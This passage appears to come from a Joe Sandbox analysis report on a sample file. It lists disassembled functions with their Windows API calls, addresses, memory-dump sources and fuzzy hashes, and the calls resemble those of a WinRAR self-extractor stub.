                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000514C2
                                                                                                                      • Part of subcall function 0004B146: GetVersionExW.KERNEL32(?), ref: 0004B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000514E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00051500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00051513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051533
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2092733347-0
                                                                                                                    • Opcode ID: 035dd5531ca7f9ca1b943f26078eedf3a3e06e5ce6102e350261294038fab0ef
                                                                                                                    • Instruction ID: a8d5657dcd0f79867702c18a6000cb58c9888fed141f808d9f8da3607078b5c4
                                                                                                                    • Opcode Fuzzy Hash: 035dd5531ca7f9ca1b943f26078eedf3a3e06e5ce6102e350261294038fab0ef
                                                                                                                    • Instruction Fuzzy Hash: 1631F775508306ABD704DFA8C88499BBBF8FF98714F404A1EF999D3210E734D649CBA6
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00062AF1,000602FC,0005FA34), ref: 00062B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00062B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00062B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,00062AF1,000602FC,0005FA34), ref: 00062B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: ef59a2812bb7d0c02ca66f0bfc621f957fbb5a4c08cceebc030de8a46bd3889e
                                                                                                                    • Instruction ID: c94e57a07e863ecf8b29553e91e4b8310dfd46a1b63fc52d5f02e6acd471b73c
                                                                                                                    • Opcode Fuzzy Hash: ef59a2812bb7d0c02ca66f0bfc621f957fbb5a4c08cceebc030de8a46bd3889e
                                                                                                                    • Instruction Fuzzy Hash: 0401473260EB122EF66C2F74BC85A6B2B8BEF41779B202339F018600E1EF194C40D280
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00081030,00064674,00081030,?,?,00063F73,00000050,?,00081030,00000200), ref: 000697E9
                                                                                                                    • _free.LIBCMT ref: 0006981C
                                                                                                                    • _free.LIBCMT ref: 00069844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 00069851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 0006985D
                                                                                                                    • _abort.LIBCMT ref: 00069863
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 8e07a82597818e6a5a9fb16f06eb7b74de8e17fe8cd5d95625e987dfa49b9809
                                                                                                                    • Instruction ID: bd3eaa5ec08b1414bd0a8865faf0b482445d3f1789a692fa907af02a7ad9f9b4
                                                                                                                    • Opcode Fuzzy Hash: 8e07a82597818e6a5a9fb16f06eb7b74de8e17fe8cd5d95625e987dfa49b9809
                                                                                                                    • Instruction Fuzzy Hash: 46F028355046016AE6A63374BC1AB9B2AAF8FD3B30F210134F618B3593EE3988428671
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 0005DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0005DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005DC91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: 9103acd6099de1839fe7e0f86123a49526bfce165c5bb718abb54120bfdbb36d
                                                                                                                    • Instruction ID: 0bee5ba22cf0b31925a2f89cd8ec9025b7ab38ca47871dec6988f5ac296adc5a
                                                                                                                    • Opcode Fuzzy Hash: 9103acd6099de1839fe7e0f86123a49526bfce165c5bb718abb54120bfdbb36d
                                                                                                                    • Instruction Fuzzy Hash: 1DF04F72A01219BBDB206BA5EC4DDCF7FBDEF42791B004412F90AE2050D678D64ACBA0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                      • Part of subcall function 0004B92D: _wcsrchr.LIBVCRUNTIME ref: 0004B944
                                                                                                                    • _wcslen.LIBCMT ref: 0004C197
                                                                                                                    • _wcslen.LIBCMT ref: 0004C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: 202814b8aa7d9e4ea49c98be7e7acb08840b25278b7362ebc1e6a4fbe4657097
                                                                                                                    • Instruction ID: f10f7a3f996c78766cf532e9ec3d60be6ce79cb56703ab52e83725fd79bc89f6
                                                                                                                    • Opcode Fuzzy Hash: 202814b8aa7d9e4ea49c98be7e7acb08840b25278b7362ebc1e6a4fbe4657097
                                                                                                                    • Instruction Fuzzy Hash: B2417AA250231195E7B1AF348852EBFB3E4EF41700F14496EF9C16B092EBA08D85C39D
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0005CE9D
                                                                                                                      • Part of subcall function 0004B690: _wcslen.LIBCMT ref: 0004B696
                                                                                                                    • _swprintf.LIBCMT ref: 0005CED1
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,0008946A), ref: 0005CEF1
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005CFFE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                    • Opcode ID: 4de173901e6a32c84aff9d18730bfd26d9b20356d18d1dae582d32386587e92b
                                                                                                                    • Instruction ID: 9d3da9c509090cb56e460d429d7765c3fc1dcc8c5c0687535084ee3d0d7f8636
                                                                                                                    • Opcode Fuzzy Hash: 4de173901e6a32c84aff9d18730bfd26d9b20356d18d1dae582d32386587e92b
                                                                                                                    • Instruction Fuzzy Hash: D34173B1900659AAEF61AB50CC45EEF77FCEB05342F4080A7FE09E7041EA749A48CF61
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0004A275,?,?,00000800,?,0004A23A,?,0004755C), ref: 0004BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 0004BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: a78867796ec8b9a91eb3572c1820110ba7e6ffe36522b50109404561710a5b74
                                                                                                                    • Instruction ID: bc4397beaf765ba01a0e683fc04b3a85f25ee607c136cbe404b7aee8172b9ead
                                                                                                                    • Opcode Fuzzy Hash: a78867796ec8b9a91eb3572c1820110ba7e6ffe36522b50109404561710a5b74
                                                                                                                    • Instruction Fuzzy Hash: C941D4B1800215A6DF21BF24CCC1EEF77A9AF40391F048475F958A7152EB70EE94DAA8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0005B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0005B304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                                    • API String ID: 445417207-1780906847
                                                                                                                    • Opcode ID: d5a4ba1ee1e95ba0acd79c01a0e88614b7a272574b93395d329cd074912fea12
                                                                                                                    • Instruction ID: ef82a2eceb4dc6d2337a5fc014405065189aacf3a7f2378f6896b39bfb52c8ad
                                                                                                                    • Opcode Fuzzy Hash: d5a4ba1ee1e95ba0acd79c01a0e88614b7a272574b93395d329cd074912fea12
                                                                                                                    • Instruction Fuzzy Hash: 3111C472900119B6DB61AE649C4AFFF77ACFF5A712F004020FE45F6080D7A4AE4997B5
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0005B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0005B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0005B767
                                                                                                                      • Part of subcall function 0005A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005B73D,00000066), ref: 0005A6D5
                                                                                                                      • Part of subcall function 0005A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A6EC
                                                                                                                      • Part of subcall function 0005A6C2: LoadResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A703
                                                                                                                      • Part of subcall function 0005A6C2: LockResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A712
                                                                                                                      • Part of subcall function 0005A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0005B73D,00000066), ref: 0005A72D
                                                                                                                      • Part of subcall function 0005A6C2: GlobalLock.KERNEL32(00000000), ref: 0005A73E
                                                                                                                      • Part of subcall function 0005A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005A762
                                                                                                                      • Part of subcall function 0005A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005A7A7
                                                                                                                      • Part of subcall function 0005A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0005A7C6
                                                                                                                      • Part of subcall function 0005A6C2: GlobalFree.KERNEL32(00000000), ref: 0005A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    • Opcode ID: 17c2ce2f9314478bcf51461b6f99cf3890ae1cc15ab2e71e6afa9b81178caf98
                                                                                                                    • Instruction ID: f9e47529f970b169d96733c4d3954626493b75863a762534fda1dd509ea688c5
                                                                                                                    • Opcode Fuzzy Hash: 17c2ce2f9314478bcf51461b6f99cf3890ae1cc15ab2e71e6afa9b81178caf98
                                                                                                                    • Instruction Fuzzy Hash: 9A01D236640A09A7D71277749C1AEBF7AB9AFC6B63F090110FD00A7292DF758D0D46A1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0005D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0005D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: 425356066a46ec15f2bc941aaad31218917560bda55cc558ea6fd368ef55e715
                                                                                                                    • Instruction ID: 65116a067f14ff1726f55573e0ad3f9543922c335bcada3d6537ae0fce7b2d27
                                                                                                                    • Opcode Fuzzy Hash: 425356066a46ec15f2bc941aaad31218917560bda55cc558ea6fd368ef55e715
                                                                                                                    • Instruction Fuzzy Hash: E5012873244614BAE2308F649E0AF6B779CFB5AB03F114013FB05A20D0C6A6990AD779
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00067E24,00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002), ref: 00067E93
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00067EA6
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00067E24,00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002), ref: 00067EC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
